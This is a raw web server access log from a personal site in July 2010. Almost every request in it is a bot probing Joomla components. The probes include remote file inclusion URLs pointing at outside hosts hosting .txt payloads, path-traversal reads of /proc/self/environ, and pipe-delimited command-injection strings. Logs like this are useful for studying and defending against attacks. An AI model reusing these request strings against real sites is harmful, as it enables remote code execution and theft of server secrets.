74.53.98.146 - - [30/Jul/2010:10:26:33 -0700] "GET /logs/access_100627.log%20%20//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:12 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:12 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:12 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:12 -0700] "GET /index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:13 -0700] "GET /logs/access_100628.log//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:13 -0700] "GET /logs/access_100628.log//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:55 -0700] "GET /logs/access_100627.log//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:27:55 -0700] "GET /logs/access_100627.log//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:28:25 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:28:30 -0700] "GET /logs/access_100629.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:31:42 -0700] "GET /logs/access_100614.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:31:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:31:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:12 -0700] "GET /logs/access_100625.log///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:13 -0700] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:13 -0700] "GET /logs///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:43 -0700] "GET /logs/access_100615.log///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:53 -0700] "GET /logs/access_100615.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:54 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:32:54 -0700] "GET /logs////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:34:24 -0700] "GET /logs/access_100625.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
76.173.92.140 - - [30/Jul/2010:10:41:35 -0700] "GET /gcfrontsmall.jpg HTTP/1.1" 404 - "http://www.myspace.com/thegentlemancaller" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7" "brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:10:42:08 -0700] "GET /logs/access_100615.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:10:42:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:10:42:09 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
76.173.92.140 - - [30/Jul/2010:10:43:08 -0700] "GET /gcfrontsmall.jpg HTTP/1.1" 404 - "http://www.myspace.com/thegentlemancaller" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7" "brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:43:19 -0700] "GET /logs/access_100628.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:43:20 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:43:20 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:43:23 -0700] "GET /logs/access_100628.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
62.112.195.144 - - [30/Jul/2010:10:43:23 -0700] "GET /logs/?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.836" "brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:43:23 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
62.112.195.144 - - [30/Jul/2010:10:43:24 -0700] "GET /?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.836" "brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:43:24 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
65.13.185.104 - - [30/Jul/2010:10:43:42 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
65.13.185.104 - - [30/Jul/2010:10:43:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
65.13.185.104 - - [30/Jul/2010:10:43:42 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:10:45:34 -0700] "GET /logs/access_100629.log%20%20//TplLoad.php/%20/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:10:45:34 -0700] "GET /logs//TplLoad.php/%20/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:10:45:34 -0700] "GET /TplLoad.php/%20/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:10:46:09 -0700] "GET /logs/access_100625.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:47:02 -0700] "GET /logs/access_100615.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:47:03 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:47:04 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:51:00 -0700] "GET /logs/access_100625.log///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:51:00 -0700] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:51:01 -0700] "GET /logs///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:51:27 -0700] "GET /logs/access_100615.log///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:51:48 -0700] "GET /logs/access_100616.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:51:52 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:51:52 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:52:16 -0700] "GET /logs/access_100625.log//index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:52:16 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:52:17 -0700] "GET /logs//index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:53:11 -0700] "GET /logs/access_100625.log//index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:53:12 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:53:15 -0700] "GET /logs//index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:54:03 -0700] "GET /logs/access_100615.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:54:04 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:54:04 -0700] "GET /logs////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:55:33 -0700] "GET /logs/access_100614.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:55:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:10:55:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:55:41 -0700] "GET /logs/access_100625.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:56:23 -0700] "GET /logs/access_100616.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:56:54 -0700] "GET /logs/access_100625.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:56:55 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:56:55 -0700] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:56:56 -0700] "GET /logs/access_100625.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:57:06 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:57:07 -0700] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:57:24 -0700] "GET /logs/access_100615.log//index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:10:57:56 -0700] "GET /logs/access_100615.log//index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:11:01:21 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
89.108.64.192 - - [30/Jul/2010:11:01:38 -0700] "GET /logs/access_100628.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:11:02:43 -0700] "GET /logs/access_100615.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:11:02:49 -0700] "GET /logs/access_100615.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:11:05:00 -0700] "GET /logs/access_100625.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:11:05:00 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:11:05:01 -0700] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:11:06:05 -0700] "GET /logs/access_100705.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:11:06:05 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:11:06:06 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:11:06:45 -0700] "GET /logs/access_100616.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:11:08:44 -0700] "GET /logs/access_100625.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:11:08:44 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:11:08:47 -0700] "GET /logs////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:11:09:23 -0700] "GET /logs/access_100615.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:11:09:23 -0700] "GET /logs/access_100615.log///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
